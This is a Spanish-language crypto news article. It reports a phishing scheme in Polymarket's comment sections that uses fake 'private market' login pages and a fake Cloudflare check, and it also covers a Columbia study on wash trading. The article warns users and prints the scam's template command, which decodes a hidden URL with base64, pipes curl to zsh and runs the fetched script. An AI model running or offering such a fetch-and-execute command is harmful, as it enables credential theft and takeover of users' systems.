Los usuarios de Polymarket alertan sobre enlaces de phishing en mercados privados.
Polymarket vuelve a estar en los titulares, esta vez porque uno de sus operadores senior, conocido como “25usdc”, dio la voz de alarma sobre un esquema que utiliza la sección de comentarios de la plataforma para aprovecharse de usuarios desprevenidos.
Esto ocurre en un momento crucial para la plataforma Polymarket, ya que se está preparando para reingresar al mercado estadounidense y lucha por superar a rivales como Kalshi.
Los operadores de Polymarket están en alerta máxima.
Según 25usdc , los hackers han estado utilizando la sección de comentarios de Polymarket para llevar a cabo una estafa y, hasta el momento, los usuarios han perdido más de 500.000 dólares.
“Dicen: '¿Por qué no operas en los mercados privados de Polymarket? ¡Las probabilidades siempre son mucho mejores allí!'”, escribió 25usdc, antes de explicar cómo funciona toda la estafa.
Según él, todo comienza con la compra de acciones de Sí y de No para un mercado desde dos cuentas distintas. De esta forma, sus comentarios permanecen visibles incluso con el filtro de "Titulares" activado. Posteriormente, publican una URL a su sitio web de forma ofuscada.
La URL redirige al usuario desprevenido a una página de apariencia limpia con el logotipo de Polymarket y le solicita que inicie sesión por correo electrónico. Una vez verificado el correo electrónico, aparece una nueva ventana que le pide al usuario que verifique su actividad, imitando a Cloudflare.
Sin embargo, 25usdc dice que cuando haces clic en “Copiar”, en su lugar se copia un comando que se ve algo así como “curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh” y lo primero que hace, si el usuario comete el error de pegarlo en su terminal, es decodificar la cadena codificada en base64 (una URL de servidor), después de lo cual obtiene un script de ese servidor y lo ejecuta inmediatamente.
El script en cuestión puede contener cualquier cosa y, según se informa, no habrá ninguna advertencia emergente, momento en el que el daño ya estará hecho y, según 25usdc, la única solución podría ser desactivar el Wi-Fi.
“Al final, recopilan datos, registran todo lo que ocurre en tu sistema y envían un archivo zip a su servidor”, escribió 25usdc. “Luego utilizan estos datos para acceder a tus cuentas y robar tu dinero”.
Otras cosas que notó fueron la meticulosidad con la que opera el grupo; por ejemplo, borran sus huellas cambiando frecuentemente de billeteras, ocultan información en cada paso del proceso e incluso apagan el servidor que envía cargas útiles y recibe datos registrados cuando no hay ninguna víctima activa.
“Creo que la mejor manera de abordar esto es permitir que los usuarios de confianza revisen los comentarios o introducir un sistema de votos negativos que oculte las publicaciones con muchos votos negativos”, concluyó 25usdc, señalando que la simple advertencia que Polymarket muestra actualmente no será suficiente.
Aviso: No existe ningún sitio web de "mercado privado" de Polymarket con "mejores probabilidades".
Nunca introduzca su correo electrónico de Polymarket ni su código de verificación de inicio de sesión en ningún sitio que no sea nuestro sitio web oficial.
— Polymarket Traders (@PolymarketTrade) 9 de noviembre de 2025
Un nuevo estudio afirma que el volumen de Polymarket se ve inflado por operaciones ficticias.
informó Cryptopolitan , un estudio publicado recientemente por investigadores de la Universidad de Columbia afirma que el volumen de actividad en Polymarket se ha visto significativamente inflado por operaciones ficticias.
El “comercio artificial”, como lo denominaron los autores, varió a lo largo del tiempo, pero afirman que representó un promedio del 25% de todas las compras y ventas en Polymarket durante los últimos tres años.
El artículo no ha sido sometido a revisión por pares, pero ya está publicado en la plataforma de investigación de acceso abierto SSRN y está siendo revisado por Polymarket.
Para que quede claro, los autores no acusan directamente a Polymarket de lavado de dinero. Sin embargo, han resaltado elementos de la estructura basada en criptomonedas del exchange que hacen plausible la afirmación.
También han sugerido que los clientes de la empresa podrían haber participado dedentindependiente en dichas operaciones de lavado de dinero en un intento por mejorar sus posibilidades de acceder a un token digital propio que el fundador de la empresa, Shayne Coplan, insinuó que podría lanzarse el 8 de octubre.
«Tengo la esperanza de que Polymarket acoja con agrado el análisis de nuestro artículo», declaró en un correo electrónico Yash Kanoria, profesor de la escuela de negocios de la Universidad de Columbia y uno de los cuatro coautores del estudio. «Las operaciones ficticias no aportan liquidez ni información al mercado, por lo que parece valioso distinguir entre volumen auténtico e inauténtico».
Si parte del volumen de Polymarket es realmente “ficticio”, el estudio afirma que esto podría alterar la comprensión de la fortaleza relativa de Polymarket en la industria y también socavar la noción actual de que los mercados de predicción reflejan la “sabiduría de una multitud”.
“El potencial de operaciones ficticias a gran escala implica que el volumen puede no ser fiable como métrica de la actividad auténtica de la plataforma, especialmente en los intercambios basados en criptomonedas que pueden no contar con las salvaguardias adecuadas”, concluyeron los autores.
Las mentes más brillantes del mundo de las criptomonedas ya leen nuestro boletín. ¿Te apuntas? ¡ Únete !
Artículos Recomendados
